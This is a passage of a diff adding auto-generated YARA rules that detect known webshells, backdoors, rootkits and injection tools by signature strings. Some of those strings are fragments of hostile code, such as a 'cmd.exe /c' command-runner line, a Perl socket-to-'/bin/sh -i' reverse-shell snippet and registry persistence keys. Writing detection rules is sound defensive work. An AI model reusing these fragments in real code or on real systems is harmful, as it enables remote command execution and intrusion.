+		hash = "539baa0d39a9cf3c64d65ee7a8738620"
+	strings:
+		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+	condition:
+		all of them
+}
+rule HYTop_DevPack_config {
+	meta:
+		description = "Webshells Auto-generated - file config.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b41d0e64e64a685178a3155195921d61"
+	strings:
+		$s0 = "const adminPassword=\""
+		$s2 = "const userPassword=\""
+		$s3 = "const mVersion="
+	condition:
+		all of them
+}
+rule sendmail {
+	meta:
+		description = "Webshells Auto-generated - file sendmail.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75b86f4a21d8adefaf34b3a94629bd17"
+	strings:
+		$s3 = "_NextPyC808"
+		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s5 = " byMesaj "
+	condition:
+		all of them
+}
+rule hkshell_hkshell {
+	meta:
+		description = "Webshells Auto-generated - file hkshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "168cab58cee59dc4706b3be988312580"
+	strings:
+		$s1 = "PrSessKERNELU"
+		$s2 = "Cur3ntV7sion"
+		$s3 = "Explorer8"
+	condition:
+		all of them
+}
+
+rule iMHaPFtp {
+	meta:
+		description = "Webshells Auto-generated - file iMHaPFtp.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+	condition:
+		all of them
+}
+rule Unpack_TBack {
+	meta:
+		description = "Webshells Auto-generated - file TBack.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a9d1007823bf96fb163ab38726b48464"
+	strings:
+		$s5 = "\\final\\new\\lcc\\public.dll"
+	condition:
+		all of them
+}
+rule DarkSpy105 {
+	meta:
+		description = "Webshells Auto-generated - file DarkSpy105.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+	strings:
+		$s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+	condition:
+		all of them
+}
+rule EditServer_3 {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f945de25e0eba3bdaf1455b3a62b9832"
+	strings:
+		$s2 = "Server %s Have Been Configured"
+		$s5 = "The Server Password Exceeds 32 Characters"
+		$s8 = "9--Set Procecess Name To Inject DLL"
+	condition:
+		all of them
+}
+rule FSO_s_reader {
+	meta:
+		description = "Webshells Auto-generated - file reader.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+	strings:
+		$s2 = "mailto:mailbomb@hotmail."
+	condition:
+		all of them
+}
+rule ASP_CmdAsp {
+	meta:
+		description = "Webshells Auto-generated - file CmdAsp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+	strings:
+		$s2 = "' -- Read the output from our command and remove the temp file -- '"
+		$s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+		$s9 = "' -- create the COM objects that we will be using -- '"
+	condition:
+		all of them
+}
+rule KA_uShell {
+	meta:
+		description = "Webshells Auto-generated - file KA_uShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "685f5d4f7f6751eaefc2695071569aab"
+	strings:
+		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+	condition:
+		all of them
+}
+rule PHP_Backdoor_v1 {
+	meta:
+		description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0506ba90759d11d78befd21cabf41f3d"
+	strings:
+
+		$s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+		$s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+	condition:
+		all of them
+}
+rule svchostdll {
+	meta:
+		description = "Webshells Auto-generated - file svchostdll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f6756c8cb0b454c452055f189e4c3f4"
+	strings:
+		$s0 = "InstallService"
+		$s1 = "RundllInstallA"
+		$s2 = "UninstallService"
+		$s3 = "&G3 Users In RegistryD"
+		$s4 = "OL_SHUTDOWN;I"
+		$s5 = "SvcHostDLL.dll"
+		$s6 = "RundllUninstallA"
+		$s7 = "InternetOpenA"
+		$s8 = "Check Cloneomplete"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_server {
+	meta:
+		description = "Webshells Auto-generated - file server.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d38526a215df13c7373da4635541b43"
+	strings:
+		$s0 = "<!-- PageServer Below -->"
+	condition:
+		all of them
+}
+rule vanquish {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "684450adde37a93e8bb362994efc898c"
+	strings:
+		$s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+		$s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+		$s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+	condition:
+		all of them
+}
+rule winshell {
+	meta:
+		description = "Webshells Auto-generated - file winshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3144410a37dd4c29d004a814a294ea26"
+	strings:
+		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+		$s1 = "WinShell Service"
+		$s2 = "__GLOBAL_HEAP_SELECTED"
+		$s3 = "__MSVCRT_HEAP_SELECT"
+		$s4 = "Provide Windows CmdShell Service"
+		$s5 = "URLDownloadToFileA"
+		$s6 = "RegisterServiceProcess"
+		$s7 = "GetModuleBaseNameA"
+		$s8 = "WinShell v5.0 (C)2002 janker.org"
+	condition:
+		all of them
+}
+rule FSO_s_remview {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
+		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+	condition:
+		all of them
+}
+rule saphpshell {
+	meta:
+		description = "Webshells Auto-generated - file saphpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d7bba8def713512ddda14baf9cd6889a"
+	strings:
+		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006Z {
+	meta:
+		description = "Webshells Auto-generated - file 2006Z.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "fd1b6129abd4ab177fed135e3b665488"
+	strings:
+		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+	condition:
+		all of them
+}
+rule admin_ad {
+	meta:
+		description = "Webshells Auto-generated - file admin-ad.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+	strings:
+		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+	condition:
+		all of them
+}
+rule FSO_s_casus15 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+	condition:
+		all of them
+}
+rule BIN_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+	strings:
+		$s0 = "=====Remote Shell Closed====="
+		$s2 = "All Files(*.*)|*.*||"
+		$s6 = "WSAStartup Error!"
+		$s7 = "SHGetFileInfoA"
+		$s8 = "CreateThread False!"
+		$s9 = "Port Number Error"
+	condition:
+		4 of them
+}
+rule shelltools_g0t_root_uptime {
+	meta:
+		description = "Webshells Auto-generated - file uptime.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+	strings:
+		$s0 = "JDiamondCSlC~"
+		$s1 = "CharactQA"
+		$s2 = "$Info: This file is packed with the UPX executable packer $"
+		$s5 = "HandlereateConso"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule Simple_PHP_BackDooR {
+	meta:
+		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a401132363eecc3a1040774bec9cb24f"
+	strings:
+		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+		$s9 = "// a simple php backdoor"
+	condition:
+		1 of them
+}
+rule sig_2005Gray {
+	meta:
+		description = "Webshells Auto-generated - file 2005Gray.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+	strings:
+		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+	condition:
+		all of them
+}
+rule DllInjection {
+	meta:
+		description = "Webshells Auto-generated - file DllInjection.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a7b92283a5102886ab8aee2bc5c8d718"
+	strings:
+		$s0 = "\\BDoor\\DllInjecti"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f1484f882dc381dde6eaa0b80ef64a07"
+	strings:
+		$s2 = "cress.exe"
+		$s7 = "\\Debug\\Mithril."
+	condition:
+		all of them
+}
+rule hkshell_hkrmv {
+	meta:
+		description = "Webshells Auto-generated - file hkrmv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+	strings:
+		$s5 = "/THUMBPOSITION7"
+		$s6 = "\\EvilBlade\\"
+	condition:
+		all of them
+}
+rule phpshell {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1dccb1ea9f24ffbd085571c88585517b"
+	strings:
+		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+	condition:
+		all of them
+}
+rule FSO_s_cmd {
+	meta:
+		description = "Webshells Auto-generated - file cmd.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_phpft {
+	meta:
+		description = "Webshells Auto-generated - file phpft.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "60ef80175fcc6a879ca57c54226646b1"
+	strings:
+		$s6 = "PHP Files Thief"
+		$s11 = "http://www.4ngel.net"
+	condition:
+		all of them
+}
+rule FSO_s_indexer {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+	condition:
+		all of them
+}
+rule r57shell {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+	condition:
+		all of them
+}
+rule bdcli100 {
+	meta:
+		description = "Webshells Auto-generated - file bdcli100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b12163ac53789fb4f62e4f17a8c2e028"
+	strings:
+		$s5 = "unable to connect to "
+		$s8 = "backdoor is corrupted on "
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005Red {
+	meta:
+		description = "Webshells Auto-generated - file 2005Red.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+	strings:
+		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X2 {
+	meta:
+		description = "Webshells Auto-generated - file 2006X2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cc5bf9fc56d404ebbc492855393d7620"
+	strings:
+		$s2 = "Powered By "
+		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+	condition:
+		all of them
+}
+rule rdrbs084 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs084.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ed30327b255816bdd7590bf891aa0020"
+	strings:
+		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
+		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+	condition:
+		all of them
+}
+rule HYTop_CaseSwitch_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8bf667ee9e21366bc0bd3491cb614f41"
+	strings:
+		$s1 = "MSComDlg.CommonDialog"
+		$s2 = "CommonDialog1"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s5 = "EVENT_SINK_AddRef"
+		$s6 = "By Marcos"
+		$s7 = "EVENT_SINK_QueryInterface"
+		$s8 = "MethCallEngine"
+	condition:
+		all of them
+}
+rule eBayId_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0412b1e37f41ea0d002e4ed11608905f"
+	strings:
+		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+	condition:
+		all of them
+}
+rule FSO_s_phvayv {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+	condition:
+		all of them
+}
+rule byshell063_ntboot {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "Dumping Description to Registry..."
+		$s3 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule FSO_s_casus15_2 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s0 = "copy ( $dosya_gonder"
+	condition:
+		all of them
+}
+rule installer {
+	meta:
+		description = "Webshells Auto-generated - file installer.cmd"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a507919ae701cf7e42fa441d3ad95f8f"
+	strings:
+		$s0 = "Restore Old Vanquish"
+		$s4 = "ReInstall Vanquish"
+	condition:
+		all of them
+}
+rule uploader {
+	meta:
+		description = "Webshells Auto-generated - file uploader.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b9a9aab319964351b46bd5fc9d6246a8"
+	strings:
+		$s0 = "move_uploaded_file($userfile, \"entrika.php\"); "
+	condition:
+		all of them
+}
+rule FSO_s_remview_2 {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s0 = "<xmp>$out</"
+		$s1 = ".mm(\"Eval PHP code\")."
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_r57 {
+	meta:
+		description = "Webshells Auto-generated - file r57.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "903908b77a266b855262cdbce81c3f72"
+	strings:
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X {
+	meta:
+		description = "Webshells Auto-generated - file 2006X.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+	strings:
+		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+	condition:
+		all of them
+}
+rule FSO_s_phvayv_2 {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+	condition:
+		all of them
+}
+rule elmaliseker {
+	meta:
+		description = "Webshells Auto-generated - file elmaliseker.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ccf48af0c8c09bbd038e610a49c9862e"
+	strings:
+		$s0 = "javascript:Command('Download'"
+		$s5 = "zombie_array=array("
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_resolve {
+	meta:
+		description = "Webshells Auto-generated - file resolve.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "69bf9aa296238610a0e05f99b5540297"
+	strings:
+		$s0 = "3^n6B(Ed3"
+		$s1 = "^uldn'Vt(x"
+		$s2 = "\\= uPKfp"
+		$s3 = "'r.axV<ad"
+		$s4 = "p,modoi$=sr("
+		$s5 = "DiamondC8S t"
+		$s6 = "`lQ9fX<ZvJW"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+	condition:
+		all of them
+}
+rule FSO_s_tool {
+	meta:
+		description = "Webshells Auto-generated - file tool.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a1e1e889fdd974a130a6a767b42655b"
+	strings:
+		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+	strings:
+		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+	condition:
+		all of them
+}
+rule byloader {
+	meta:
+		description = "Webshells Auto-generated - file byloader.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f0d6dc26055653f5844ded906ce52df"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "NTFS Disk Driver Checking Service"
+		$s3 = "Dumping Description to Registry..."
+		$s4 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_Fport {
+	meta:
+		description = "Webshells Auto-generated - file Fport.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
+	strings:
+		$s4 = "Copyright 2000 by Foundstone, Inc."
+		$s5 = "You must have administrator privileges to run fport - exiting..."
+	condition:
+		all of them
+}
+rule BackDooR__fr_ {
+	meta:
+		description = "Webshells Auto-generated - file BackDooR (fr).php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a79cac2cf86e073a832aaf29a664f4be"
+	strings:
+		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+	condition:
+		all of them
+}
+rule FSO_s_ntdaddy {
+	meta:
+		description = "Webshells Auto-generated - file ntdaddy.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+	strings:
+		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+	condition:
+		all of them
+}
+rule nstview_nstview {
+	meta:
+		description = "Webshells Auto-generated - file nstview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3871888a0c1ac4270104918231029a56"
+	strings:
+		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_upload {
+	meta:
+		description = "Webshells Auto-generated - file upload.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b09852bda534627949f0259828c967de"
+	strings:
+		$s0 = "<!-- PageUpload Below -->"
+	condition:
+		all of them
+}
+rule PasswordReminder {
+	meta:
+		description = "Webshells Auto-generated - file PasswordReminder.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+	strings:
+		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+	condition:
+		all of them
+}
+rule Pack_InjectT {
+	meta:
+		description = "Webshells Auto-generated - file InjectT.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "983b74ccd57f6195a0584cdfb27d55e8"
+	strings:
+		$s3 = "ail To Open Registry"
+		$s4 = "32fDssignim"
+		$s5 = "vide Internet S"
+		$s6 = "d]Software\\M"
+		$s7 = "TInject.Dll"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp_2 {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s2 = " Then Response.Write \""
+		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+	condition:
+		all of them
+}
+rule FSO_s_c99 {
+	meta:
+		description = "Webshells Auto-generated - file c99.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f9ba02eb081bba2b2434c603af454d0"
+	strings:
+		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+	condition:
+		all of them
+}
+rule rknt_zip_Folder_RkNT {
+	meta:
+		description = "Webshells Auto-generated - file RkNT.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f97386dfde148942b7584aeb6512b85"
+	strings:
+		$s0 = "PathStripPathA"
+		$s1 = "`cLGet!Addr%"
+		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s3 = "oQToOemBuff* <="
+		$s4 = "ionCdunAsw[Us'"
+		$s6 = "CreateProcessW: %S"
+		$s7 = "ImageDirectoryEntryToData"
+	condition:
+		all of them
+}
+rule dbgntboot {
+	meta:
+		description = "Webshells Auto-generated - file dbgntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "4d87543d4d7f73c1529c9f8066b475ab"
+	strings:
+		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+		$s3 = "sth junk the M$ Wind0wZ retur"
+	condition:
+		all of them
+}
+rule PHP_shell {
+	meta:
+		description = "Webshells Auto-generated - file shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+	strings:
+		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+	condition:
+		all of them
+}
+rule hxdef100 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "55cc1769cef44910bd91b7b73dee1f6c"
+	strings:
+		$s0 = "RtlAnsiStringToUnicodeString"
+		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+	condition:
+		all of them
+}
+rule rdrbs100 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7c752bcd6da796d80a6830c61a632bff"
+	strings:
+		$s3 = "Server address must be IP in A.B.C.D format."
+		$s4 = " mapped ports in the list. Currently "
+	condition:
+		all of them
+}
+rule Mithril_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "017191562d72ab0ca551eb89256650bd"
+	strings:
+		$s0 = "OpenProcess error!"
+		$s1 = "WriteProcessMemory error!"
+		$s4 = "GetProcAddress error!"
+		$s5 = "HHt`HHt\\"
+		$s6 = "Cmaudi0"
+		$s7 = "CreateRemoteThread error!"
+		$s8 = "Kernel32"
+		$s9 = "VirtualAllocEx error!"
+	condition:
+		all of them
+}
+rule hxdef100_2 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+	strings:
+		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+	condition:
+		all of them
+}
+rule Release_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "76a59fc3242a2819307bb9d593bef2e0"
+	strings:
+		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+		$s1 = "0 0&00060K0R0X0f0l0q0w0"
+		$s2 = ": :$:(:,:0:4:8:D:`=d="
+		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
